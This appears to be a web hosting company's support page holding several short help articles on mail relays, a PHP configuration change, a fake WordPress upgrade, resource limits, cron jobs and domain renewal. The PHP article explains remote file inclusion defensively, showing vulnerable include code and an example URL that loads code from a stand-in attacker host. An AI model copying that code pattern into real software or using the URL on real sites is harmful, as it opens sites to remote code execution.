Web Hosting Resource

Closed: Maintenance completed without issue/as expected.
(more…)

webform.pipeten.co.uk is a dedicated email server for handling email generated by Pipe Tens web servers.  If you are wishing to use a form or script on your website to send emails and are prom[ted to specify a relay or smtp server then please use webform.pipeten.co.uk.  Using mail.pipeten.co.uk or mail.youdomain.ext may return ‘relay denied’ or other errors for sending to non-local domains.

We keep individual POP/IMAP/SMTP mailboxes separate to the web server generated email as part of anti-spam/blacklisting prevention and monitoring measures.

Brief: On Monday November 24th we will be changing a php.ini configuration option on all of our shared hosting servers which may affect your website code.

Currently all Sheffield Linux servers run with the option allow_url_fopen=On. On November 24th we will be changing the option to allow_url_fopen=Off.

The reasons for this change and its impact are as follows…

With this option enabled, all of PHP’s file handling functions will accept a full URL as a parameter and will download that page and use it as a file. This is very convenient in a number of applications such as retrieving RSS feeds. Unfortunately it leads to unexpected results and serious security problems in many applications. For example in the following simple code…

$pagef = $_REQUEST["pagef"];
include ($pagef);

The programmer intends that the pagef request string will specify a file somewhere in the account to be included as part of the main page, to be called with a request like…

http://mydomain.com/display.php?pagef=footer.html

An attacker can create his own URL and exploit this page to download and execute his own code on your web site e.g.

http://mydomain.com/display.php?pagef=http://evil.info/exploit.txt

Expected Impact: By disabling the allow_url_fopen option, this attack vector is closed off while still allowing the intended function of such site code. The drawback is that other code which might for example use

readfile(”http://feeds.feedburner.com/DilbertDailyStrip”);

to retrieve a remote RSS feed will no longer work.

What you need to do: The supported alternative is Curl which is available to PHP on all of our servers. Many popular applications will automatically fall back on the Curl functions however you may need to upgrade to the latest version of your web application. The PHP documentation for the Curl functions is available at http://www.php.net/manual/en/ref.curl.php

“It looks like sites which have not upgraded to 2.6.3 are being exploited in an interesting way whereby a hacker, probably using an automated script, is hacking into sites with the vulnerability and changing the settings of one of the dashboard modules to point to a different feed thereby encouraging people to go to a different site which is offering a dodgy upgrade.”

That was the response of Peter Westwood (one of the lead developers of popular blogging software provider Wordpress) upon news that some of its users with an outdated Wordpress installation may be prompted to download a more compromised version from a spoof website (wordpresZ.org).

It’s important that all customers verify the source, security and legitimacy of any software that they install to their Pipe Ten hosting accounts and pay special attention when upgrading.

Read more at The Register - Fake site punts Trojanised WordPress and additional analysis at the sources blog.

A quick cheat sheet for working with .htaccess files and Apache under Linux. Many of these options/features are also available via the control panel. (more…)

If you receive an email notification with the the subject ‘Warning (Approaching resource limit)’ it means that a resource in your hosting account has nearly reached its designated quota. This could be your web space, traffic, database or mailbox quota. Unlike the other three, the mail box quota cannot be overused and be charged additionally. It will stop receiving emails when you have reached the maximum limit and won’t start accepting new emails until there is space within the mail box again. There are a number of methods to prevent this from happening so you have a full functioning email address all the times. (more…)

If you have a Linux web hosting plan then you can use the following instructions to create an .htaccess file: (more…)

The best way to submit a support ticket to our support team is via the support section of your Pipe Ten control panel as this helps us verify you against your account and will speed up the processing your request. If for some reason you cannot access your control panel you can email support@pipeten.co.uk 24 hours a day or use the online chat facility available on our website during office hours.

When raising a support ticket please try to include as much information as possible as this can also speed up the trouble shooting process. Depending on the enquiry, items to mention in your support ticket may include: the domain name involved, steps to replicate any issues you are experiencing, any error messages that may appear, screenshots if required, and anything else that you feel may aid us source the solution to your issue.

If they are PHP files intended to be called by the command line then PHP binary should be used at
/hsphere/shared/php4/bin/php
or
/hsphere/shared/php5/bin/php

If it is intended to use them as if they were in the web browser then wget should be used, available at /usr/share/wget
i.e.
/usr/share/wget -v –delete-after http://domain.com/path/to/script.php

For more instructions on how to configure crontabs please take a look at the following instructions: http://www.pipeten.info/h-sphere/direct_access_to_server.html#crontab

For other web server configurations please contact support

If your domain name is registered through Pipe Ten’s domain registration system you can renew your domain name by following the steps outlined below:

1. Log into your account at http://domains.pipeten.com/
2. Click on ‘MY ACCOUNT’
3. Click the ‘View/Edit’ link next to where it says ‘Number of Domains in Your Account’
4. Click the ‘R’ icon next to the domain you want to renew
5. Then follow the checkout link to pay for the renewal

If your domain name is registered directly within your web hosting account please take a look at the following instructions: http://www.pipeten.info/h-sphere/registering_domains.html#renew